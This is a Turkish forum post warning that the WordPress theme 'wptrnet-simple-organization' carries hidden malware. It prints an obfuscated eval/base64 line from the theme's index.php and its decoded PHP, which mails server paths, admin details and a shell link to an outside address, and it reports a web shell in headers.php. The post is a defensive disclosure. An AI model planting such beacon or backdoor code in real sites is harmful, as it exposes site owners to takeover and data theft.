Yeni Yaptıgım Bir Site için Tema araştırıyordum bu detay gözume takıldı .. Klasör içindeki index.php en alt satırında
Yazmakta idi merak edip araştırdım bu kodda ne yazıyor diye
iyi bakın ne yazıyor..
Buda yetmezmiş gibi Shell eklemişler scriptlere Siteleri heklemek için .. headers.php içine shell kodlarını eklemişler admin
ve db nizi heklemek adına .. Siz Siz Olun Dikkatli Olun Bunu Açıklayanı pek görmedim Beni Çok heklemişlerdi Sizin Başınıza
gelmesin dileklerimle ..
headers.php kodlarınıda eklemiştim ama konuyu açamadım yazı boyutu acısından izin vermedi ..
Yukardaki yazılanları dikkate alınız arkadaşlar Admin şifrenizi Databasenizi dahil çalabiliyorlar Birde neden hekleniyoruz deriz Temalar Sagolsun..
Çektiğim tema adı : wptrnet-simple-organization
PHP:
<? eval(base64_decode("JGtpbWU9ImluZGlyZWxpbWhlbWVuQGdtYWlsLmNvbSI7DQokYmFzbGlrPSJXb3JkUHJlc1MgVGVtYSBTdyBBdmNpc2kgVjMuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBBZG1pbiA6ICIuJF9TRVJWRVJbJ1NFUlZFUl9BRE1JTiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJTZXJ2ZXIgaXNsZXRpbSBzaXN0ZW1pIDogIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNoZWxsIExpbmsgOiBodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXS4icm4iOw0KJEVMX011SGFNTWVELj0iQXZsYW5hbiBTaXRlIDogIiAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiJybiI7DQptYWlsKCRraW1lLCAkYmFzbGlrLCAkRUxfTXVIYU1NZUQpOw=="));?>Yazmakta idi merak edip araştırdım bu kodda ne yazıyor diye
iyi bakın ne yazıyor..
PHP:
z�
�r�^$kime="[email protected]";
$baslik="WordPresS Tema Sw Avcisi V3.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";
mail($kime, $baslik, $EL_MuHaMMeD);Buda yetmezmiş gibi Shell eklemişler scriptlere Siteleri heklemek için .. headers.php içine shell kodlarını eklemişler admin
ve db nizi heklemek adına .. Siz Siz Olun Dikkatli Olun Bunu Açıklayanı pek görmedim Beni Çok heklemişlerdi Sizin Başınıza
gelmesin dileklerimle ..
headers.php kodlarınıda eklemiştim ama konuyu açamadım yazı boyutu acısından izin vermedi ..
Yukardaki yazılanları dikkate alınız arkadaşlar Admin şifrenizi Databasenizi dahil çalabiliyorlar Birde neden hekleniyoruz deriz
Temalar Sagolsun..Çektiğim tema adı : wptrnet-simple-organization
